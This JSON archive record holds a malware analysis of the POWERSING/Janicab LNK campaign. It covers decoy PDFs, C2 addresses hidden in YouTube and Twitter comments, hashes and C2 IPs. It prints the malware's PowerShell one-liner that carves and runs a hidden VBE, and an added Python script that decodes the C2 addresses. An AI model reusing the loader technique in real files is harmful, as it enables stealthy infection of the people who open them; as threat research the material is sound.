{
	"id": "d2cff49e-1aef-4e9d-90ee-61b7d7db0b8f",
	"created_at": "2026-04-06T00:15:30.408984Z",
	"updated_at": "2026-04-10T13:11:29.302159Z",
	"deleted_at": null,
	"sha1_hash": "abdebb50201dd5cc1667325c5ee413e31b23c0f2",
	"title": "POWERSING - FROM LNK FILES TO JANICAB THROUGH YOUTUBE \u0026 TWITTER",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 241271,
	"plain_text": "POWERSING - FROM LNK FILES TO JANICAB THROUGH\r\nYOUTUBE \u0026 TWITTER\r\nBy Mo Bustami\r\nPublished: 2018-12-13 · Archived: 2026-04-05 13:21:37 UTC\r\nINTRODUCTION\r\nThis post discusses an ongoing campaign that has been operational since at least August 2017. It looks into the delivery of the malware, some analysis of the payload, and some additional insights about the campaign. It is by no means a full in-depth analysis of the malware and all of its functionality.\r\nLAWYER UP!!\r\nThis all started with a tweet by the AWESOME Jacob Soo (@_jsoo_), whom I recommend you follow if you are interested in analyzing malware and tracking different threat actors.\r\nThe sample is a ZIP file titled \"Dubai_Lawyers_update_2018.zip\" and the archive contains two LNK files that purport to be PDF files. The actors in this case borrowed a couple of files from the British Embassy site and used them as decoy documents to lure victims into believing that these files are in fact legitimate:\r\nhttps://assets.publishing.service[.]gov.uk/government/uploads/system/uploads/attachment_data/file/754075/Dubai_List_of_Lawyers_Nov_2018.pdf\r\nI took the time to analyze the sample and it seems to do the following:\r\nThe LNK files contain Base64 strings that, once decoded, reveal some hard-coded URLs. 
We will get back to this in a moment:\r\nhxxp://shockchan[.]com/2-girls-1-cup-video/;hxxp://shockchan[.]com/2-girls-1-cup-video/;hxxp://shockchan[.]com/2-girls-1-cup-video/;hxxp://shockchan[.]com/2-girls-1-cup-video/;hxxps://youtu[.]be/40rHiF75z5o,\r\nhxxps://brady4th[.]wordpress[.]com/2018/11/15/opener/ ,hxxps://twitter[.]com/Fancy65716779,\r\nhxxps://plus[.]google[.]com/u/0/collection/U84ZPF\r\nhttps://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html\r\nPage 1 of 6\n\nThe LNK contains a small PowerShell script that carves a VBE file out of the LNK itself: it copies the LNK to %tmp%, reads it back as text, keeps the last 2340 characters, writes them to a .vbe file and runs that file with CScript:\r\n\"/c powershell -c \"$m='Dubai.pdf.lnk';$t=[environment]::getenvironmentvariable('tmp');cp $m $t\\$m;$z=$t+'\\'+@(gci -name $t $m -rec)[0];$a=gc $z|out-string;$q=$a[($a.length-2340)..$a.length];[io.file]::WriteAllbytes($t+'\\.vbe',$q);CsCrIpT $t'\\.vbe'\"\r\nThe VBE file, once decoded, is responsible for:\r\nCreating the decoy PDF document\r\nCreating a PowerShell script from chunks of code within the original LNK file\r\nRunning that PowerShell code\r\nThe resulting PowerShell script is also obfuscated. 
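Both mechanical steps of this chain, carving the appended VBE out of the LNK the way the one-liner above does, and turning the Base64 chunk of a 'Yo bro i sing' comment into an IP address the way the LongtoIP routine described under CALCULATING THE C2 does, are reproduced in the added Python script below. It is not code from the original post or from the malware. The 2340-character tail length and the divisor 25835 are the values the post reports for its samples; the LNK header check, the VBE signature check and the restriction to 32-bit quotients are my additions; the spacing of the comment string and the big-endian reading of the truncated quotient are assumptions, and the sample LNK bytes and the sample comment are constructed. Under that reading the two Base64 values quoted in the post resolve to 105.104.10.115 and 52.67.106.251 with the divisor 25835, and to 185.86.150.33 and 91.229.77.77 with the divisor 14693 that the post's peers found.

```python
import base64
import ipaddress
import re

# Added triage helpers for the POWERSING delivery chain. Not the post author's
# code and not the malware's code; it reproduces the two steps the post
# explains, using the concrete values the post reports.

# ---- 1. Carving the appended VBE the way the LNK's PowerShell one-liner does ----

# Minimal shell-link header: HeaderSize 0x4C, then LinkCLSID
# 00021401-0000-0000-C000-000000000046 in its on-disk little-endian layout.
LNK_MAGIC = bytes.fromhex('4c000000' '0114020000000000c000000000000046')
VBE_MAGIC = b'#@~^'   # signature the Windows Script Encoder puts at the start of a .vbe

def carve_tail(lnk_bytes, tail_len=2340):
    '''Return the last tail_len bytes of an LNK file.

    The one-liner in the post copies the LNK to %tmp%, reads it back as text,
    keeps the final 2340 characters and writes them to .vbe. 2340 is that
    sample's value and must be adjusted per sample. The header check is an
    added sanity check, not something the one-liner does.'''
    if not lnk_bytes.startswith(LNK_MAGIC):
        raise ValueError('not a shell link file (bad header)')
    if len(lnk_bytes) < len(LNK_MAGIC) + tail_len:
        raise ValueError('file shorter than header plus expected tail')
    return lnk_bytes[-tail_len:]

def looks_like_vbe(blob):
    '''True when the carved tail starts with the Script Encoder signature.'''
    return blob.startswith(VBE_MAGIC)

# Constructed sample, not a real LNK: header, some filler, then a 2340-byte tail.
SAMPLE_TAIL = VBE_MAGIC + b'X' * (2340 - len(VBE_MAGIC))
SAMPLE_LNK = LNK_MAGIC + bytes(60) + SAMPLE_TAIL

# ---- 2. From the social-media comment to the C2 address ----

# Divisor the post identifies in the LongtoIP routine (CALCULATING THE C2 below).
# The routine truncates, so integer division drops the remainder.
POWERSING_DIVISOR = 25835

# The post gives the comment as 'Yo bro i sing' + Base64 + 'My keyboard doesnt
# work..' + encoded text. Spacing between the parts is an assumption, so the
# pattern accepts zero or more spaces.
COMMENT_RE = re.compile(
    r'Yo bro i sing[ ]*([A-Za-z0-9+/=]+)[ ]*My keyboard doesnt work[.][.]')

def extract_chunks(text):
    '''All Base64 chunks found in a blob of page text (comments, tweets, ...).'''
    return COMMENT_RE.findall(text)

def decode_long(b64_chunk):
    '''Base64 chunk -> the decimal integer it wraps.'''
    return int(base64.b64decode(b64_chunk).decode('ascii'))

def long_to_ip(value):
    '''Big-endian long-to-IP, my reading of what LongtoIP does.'''
    if not 0 <= value < 2 ** 32:
        raise ValueError('value does not fit in an IPv4 address')
    return str(ipaddress.IPv4Address(value))

def powersing_c2(b64_chunk, divisor=POWERSING_DIVISOR):
    '''Decode, integer-divide by the divisor, render as dotted quad.'''
    return long_to_ip(decode_long(b64_chunk) // divisor)

def exact_divisors(n, max_divisor=65536):
    '''The peers' factor-pair idea: divisors d below max_divisor for which n / d
    is exact and the quotient fits in 32 bits (a candidate IP address).'''
    return [(d, n // d) for d in range(1, max_divisor)
            if n % d == 0 and n // d < 2 ** 32]

# Constructed comment using the first Base64 value quoted in the post; the
# trailing text stands in for the encoded characters that follow the marker.
SAMPLE_COMMENT = 'Yo bro i sing NDU2ODcyODgyNzE4Nzc= My keyboard doesnt work.. Kd9xQ'

if __name__ == '__main__':
    tail = carve_tail(SAMPLE_LNK)
    print(len(tail), looks_like_vbe(tail))
    for chunk in extract_chunks(SAMPLE_COMMENT):
        print(chunk, powersing_c2(chunk), exact_divisors(decode_long(chunk)))
```

In practice, point extract_chunks at a dump of the comments under a video, a tweet thread or a blog page and run every chunk through powersing_c2 to get the address the implant would contact; exact_divisors is only the hunting aid the post's peers used to spot the alternative divisor, it is not what the malware computes.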
Once decoded, the script, which is over 900 lines and which I am calling POWERSING, acts as the main payload and constructs a DLL to run the main functionality of the malware.\r\nSINGING KEYBOARD - FROM YOUTUBE AND TWITTER TO ATTACKER COMMAND \u0026 CONTROL\r\nIf we visit some of the URLs that are hard-coded within the LNK samples, we notice a recurring theme: all of them carry a string that looks like the one below (screenshot in the original post).\r\nThe POWERSING code seems to instruct the victim machine to visit different hard-coded sites (YouTube, Twitter, Google+, WordPress, etc.) looking for a specific string of the form\r\n\"Yo bro i sing\" + Base64-encoded string + \"My keyboard doesnt work..\" + string of encoded/encrypted characters.\r\nBased on this, I was able to find additional links and sites which are probably related to the same campaign.\r\n1. Google results - hxxps://www.google.com/search?q=%22Yo+bro+i+sing%22+%2B+%22My+keyboard+doesnt+work..%22\u0026filter=0\u0026biw=1536\u0026bih=723\r\n2. YouTube results - hxxps://www.youtube.com/results?search_query=%22Yo+bro+i+sing%22+%2B+%22My+keyboard+doesnt+work..%22\r\n3. Oldest YouTube video with such a comment string is from over a year ago - hxxps://www.youtube.com/watch?v=1jrvJD2uKjM\r\n4. Twitter results - hxxps://twitter.com/search?q=%22Yo%20bro%20i%20sing%22%20%2B%20%22My%20keyboard%20doesnt%20work..%22\u0026src=typd\r\n5. Reddit post - hxxps://www.reddit.com/user/brain-fart-yo/comments/9ypxgk/warming_up/\r\n6. 
Imgur - hxxps://imgur.com/t/ily/36tbM2J\r\nThe POWERSING code includes a function (LongtoIP) that seems to take the Base64 chunk from the above string, decode it and run some arithmetic on it to produce the real C2.\r\nBased on this, I was able to calculate 4 different potential C2 servers from the different comments and links I found:\r\n54.38.192[.]174 – most recent, from around mid-November\r\n91.229.76[.]153\r\n105.104.10[.]115 – oldest, from Aug 2017\r\n52.67.106[.]251\r\nThe first two IP addresses seem to have shared the same SSL certificate (screenshot in the original post).\r\nUNCOVERING ADDITIONAL SAMPLES\r\nI wanted to see if I could find additional samples related to this campaign, and after some more digging I found a couple of older samples going back to Nov 2017.\r\nSAMPLE 1 - ITW name: p2_ecamos_Volatility_Strategy_2X[.]pdf.lnk\r\nHASH - e91f0189ed04972ce71fd10631e8830c585908089a38a05a12bd4e43d6e21024\r\nCurrent Detection – 0/59\r\nSAMPLE 2 - ITW name: ecamos_Volatility_Strategy_2X[.]pdf.lnk\r\nHASH - 0c7e8427ee61672568983e51bf03e0bcf6f2e9c01d2524d82677b20264b23a3f\r\nCurrent Detection – 0/59\r\nEcamos seems to be an investment company based in Switzerland (hxxps://www.ecamos[.]ch/en/).\r\nThe lure was most probably taken from:\r\nhxxps://www.ecamos[.]ch/downloads/ecamos%20Volatility%20Strategy%202X_factsheet_2018%20November.pdf\r\nThese samples had the following hard-coded URLs:\r\nhxxp://shockchan[.]com/2-girls-1-cup-video/\r\nhxxps://twitter[.]com/sabinepfeffer69/status/928607342177988608\r\nhxxps://mads281.wordpress[.]com\r\nhxxps://www.youtube[.]com/watch?v=ZRQ-1I856XA\r\nADDITIONAL INSIGHTS AND FINAL THOUGHTS\r\nWhen I first started looking into this I reached out to a few peers to get their insights and expertise, and I was not disappointed, as some of them provided valuable information:\r\nCALCULATING THE C2\r\nIn relation to the function 
responsible for calculating the potential C2 IP addresses, we noticed that two of the values, when divided by 25835, do not produce an integer (the result has a fractional part). Keeping in mind that, based on the variable types used in the function, the calculated result simply drops the fractional part, we still wanted to look for a divisor that would produce an exact integer.\r\nBase64: NDU2ODcyODgyNzE4Nzc=\r\nDecoded: 45687288271877\r\nFactor pairs: (1, 45687288271877) (7, 6526755467411) (29, 1575423733513) (203, 225060533359) (2099, 21766216423) (14693, 3109459489) (60871, 750559187) (426097, 107222741)\r\nCalculated C2 IP (divisor 14693, quotient 3109459489): 185.86.150[.]33\r\nBase64: MjI2NTI5OTQyOTg5Nzc=\r\nDecoded: 22652994298977\r\nFactor pairs: (1, 22652994298977) (3, 7550998099659) (7, 3236142042711) (9, 2516999366553) (21, 1078714014237) (27, 838999788851) (63, 359571338079) (189, 119857112693) (2099, 10792279323) (2339, 9684905643) (6297, 3597426441) (7017, 3228301881) (14693, 1541754189) (16373, 1383557949) (18891, 1199142147) (21051, 1076100627) (24413, 927907029) (44079, 513918063) (49119, 461185983) (56673, 399714049) (63153, 358700209) (73239, 309302343) (132237, 171306021) (147357, 153728661) (170891, 132558147) (219717, 103100781) (396711, 57102007) (442071, 51242887) (512673, 44186049) (659151, 34366927) (1538019, 14728683) (4614057, 4909561)\r\nCalculated C2 IP (divisor 14693, quotient 1541754189): 91.229.77[.]77\r\nNote that 14693 appears in both factor lists and is the only shared factor whose quotient fits in 32 bits; the function's own truncating division by 25835 turns the same two inputs into 105.104.10[.]115 and 52.67.106[.]251, both already in the list above.\r\nInterestingly, these two IP addresses also shared an SSL certificate, which makes it even more likely that they belong to the same campaign (screenshot in the original post).\r\nRE-INTRODUCING JANICAB\r\nAs I was writing this post, I was pointed toward a blog post that talks about a malware called Janicab that shares a very similar, almost identical TTP, and the samples I found could be variants of that malware or use the same 
functionality/code:\r\nhttps://www.f-secure.com/weblog/archives/00002803.html\r\nhttps://www.f-secure.com/weblog/archives/00002576.html\r\nThis is the first time I have actually heard of “Janicab”, so I don’t have much information about it other than that it seems to be cross-platform (Mac and Windows). The F-Secure posts above cover it in detail and provide more information about its capabilities.\r\nRunning additional searches for “Janicab” returns more samples that share more similarities with this campaign. If this is indeed related to the Janicab family/operation, it shows that this malware/operation has been going on since at least 2013.\r\nINDICATORS OF COMPROMISE\r\nLNK FILES RELATED TO POWERSING\r\nf4610b65eba977b3d13eba5da0e38788a9e796a3e9775dd2b8e37b3085c2e1af\r\n880607cc2da4c3213ea687dabd7707736a879cc5f2f1d4accf79821e4d24d870\r\n22ede766fba7551ad0b71ef568d0e5022378eadbdff55c4a02b42e63fcb3b17c\r\n4920e6506ca557d486e6785cb5f7e4b0f4505709ffe8c30070909b040d3c3840\r\ne91f0189ed04972ce71fd10631e8830c585908089a38a05a12bd4e43d6e21024\r\n0c7e8427ee61672568983e51bf03e0bcf6f2e9c01d2524d82677b20264b23a3f\r\nRECENT JANICAB LNK SAMPLES\r\n621e256d1db0dd41eef73d2dfe8b7db3cde337dce8037c46c6f5fa7e9ce33135\r\n5039e8f97dc499fef344b56270ae534a0cea1c93ddacf17ae46c7f922f6139d8\r\n01960de7c05329b2b8f6e838cdc02c676782b7954d2ff68d8165d412054ce034\r\nPOTENTIAL POWERSING C2\r\n54.38.192[.]174\r\n91.229.76[.]153\r\n105.104.10[.]115\r\n52.67.106[.]251\r\n185.86.150[.]33\r\n91.229.77[.]77\r\nSource: https://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html"
	],
	"report_names": [
		"powersing-from-lnk-files-to-janicab.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434530,
	"ts_updated_at": 1775826689,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/abdebb50201dd5cc1667325c5ee413e31b23c0f2.pdf",
		"text": "https://archive.orkl.eu/abdebb50201dd5cc1667325c5ee413e31b23c0f2.txt",
		"img": "https://archive.orkl.eu/abdebb50201dd5cc1667325c5ee413e31b23c0f2.jpg"
	}
}